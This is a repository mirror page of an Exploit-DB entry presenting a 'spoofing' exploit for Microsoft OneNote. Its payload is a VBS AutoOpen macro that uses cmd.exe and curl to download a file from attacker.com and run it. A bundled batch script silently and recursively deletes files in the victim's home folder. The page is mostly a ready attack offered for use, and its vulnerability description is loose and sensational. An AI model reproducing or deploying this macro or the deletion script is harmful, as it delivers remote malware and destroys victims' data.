bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/51538.txt
Exploit-DB ea194c414f DB: 2023-06-23 
3 changes to exploits/shellcodes/ghdb

Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)

Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing

MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution

Super Socializer 7.13.52 - Reflected XSS
2023-06-23 00:16:26 +00:00

45 lines
No EOL
1.3 KiB
Text
Raw Blame History

## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected
## Description:
Microsoft OneNote is vulnerable to spoofing attacks. The malicious
user can trick the victim into clicking on a very maliciously crafted
URL or download some other malicious file and execute it. When this
happens the game will be over for the victim and his computer will be
compromised.
Exploiting the vulnerability requires that a user open a specially
crafted file with an affected version of Microsoft OneNote and then
click on a specially crafted URL to be compromised by the attacker.
STATUS: HIGH Vulnerability
[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",
vbNormalFocus)
End Sub
```
[+]Inside-exploit
```
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)
## Time spend:
01:15:00
--
Reference in a new issue View git blame Copy permalink